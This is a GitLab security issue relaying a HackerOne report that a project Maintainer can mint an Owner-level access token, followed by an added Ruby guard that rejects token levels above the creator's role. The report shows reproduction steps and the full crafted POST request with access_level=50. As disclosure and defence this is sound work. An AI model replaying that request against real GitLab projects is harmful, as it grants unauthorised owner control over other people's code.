  • #390696
Closed
Open
Issue created Feb 07, 2023 by GitLab SecurityBot@gitlab-securitybotReporter

Maintainer user can become owner of project

HackerOne report #1805549 by shubham_sohi on 2022-12-14, assigned to @fvpotvin:


Report

Summary

I have found a way that can be used by a low-privileged user to become owner of a project.

NOTE:

You need a premium GitLab account to verify the issue.

Steps to reproduce

1. Log in to the admin account.
2. Go to https://gitlab.com/projects/new, click on "Create blank project" and create a project with the name P.
3. Now in project P go to Project Information > Members and invite user A with the Maintainer role.
Screenshot_(426).png
4. Now log in to user A's account.
5. In project P go to Settings > Access Tokens; here user A can create an access token.
6. But user A can only create access tokens for the roles Maintainer, Guest, Reporter and Developer, and does not have permission to create an access token for the Owner role.
7. Now run the request below in user A's account with group_name and project_P_name.

POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2  
Host: gitlab.com  
Content-Length: 444  
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: { REDACTED }  
X-Csrf-Token: { REDACTED }

resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry  

8. In the response you will get a new access token.
9. Now you can use this token to perform all actions in the project as admin.

Impact

Maintainer role user gets owner privileges.

What is the expected correct behavior?

Maintainer role user should only be able to create access tokens for Maintainer, Guest, Reporter and Developer.

Output of checks

This bug happens on GitLab.com

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_(426).png

How To Reproduce

Please add reproducibility information to this section:
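The report above shows a Maintainer submitting `resource_access_token[access_level]=50` (Owner) to the project access token form, which the server accepted. The following Ruby is an added illustration of the server-side guard that closes this class of bug, not GitLab's own code or its actual fix: it parses the form body, reads the requested level, and refuses any level above the role of the member creating the token. The access level numbers follow GitLab's public role numbering; the form field names and the sample body are copied in shape from the reported request.

```ruby
require 'uri'

# Project access levels as GitLab numbers them; the reported request asks
# for 50 (Owner) from a session that only holds 40 (Maintainer).
ACCESS_LEVELS = {
  'Guest' => 10, 'Reporter' => 20, 'Developer' => 30,
  'Maintainer' => 40, 'Owner' => 50
}.freeze

class TokenAccessLevelError < StandardError; end

# Pulls the requested access_level out of a form-encoded token-creation
# body (field names as in the reported request). Returns nil when absent
# or non-numeric.
def requested_access_level(form_body)
  params = URI.decode_www_form(form_body).to_h
  value = params['resource_access_token[access_level]']
  value && Integer(value, exception: false)
end

# Hypothetical guard (not GitLab's fix): a token's role may never exceed
# the role of the member creating it, so a Maintainer cannot mint an
# Owner-level token. Returns the level to grant, or raises.
def check_token_access_level(creator_level, requested_level)
  unless ACCESS_LEVELS.value?(requested_level)
    raise TokenAccessLevelError, "unknown access level #{requested_level.inspect}"
  end
  if requested_level > creator_level
    raise TokenAccessLevelError,
          "requested level #{requested_level} exceeds creator level #{creator_level}"
  end
  requested_level
end

# Decision for a submitted body from a member holding creator_level;
# returns [:granted, level] or [:rejected, reason] so it can be logged.
def decide(form_body, creator_level)
  level = requested_access_level(form_body)
  [:granted, check_token_access_level(creator_level, level)]
rescue TokenAccessLevelError => e
  [:rejected, e.message]
end

# Constructed body, same shape as the report (access_level=50 = Owner).
REPORTED_BODY = 'resource_access_token%5Bname%5D=ksjdf&' \
                'resource_access_token%5Bexpires_at%5D=2023-01-13&' \
                'resource_access_token%5Baccess_level%5D=50&' \
                'resource_access_token%5Bscopes%5D%5B%5D=api'

p decide(REPORTED_BODY, ACCESS_LEVELS['Maintainer'])  # => [:rejected, "..."]
p decide(REPORTED_BODY, ACCESS_LEVELS['Owner'])       # => [:granted, 50]
```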
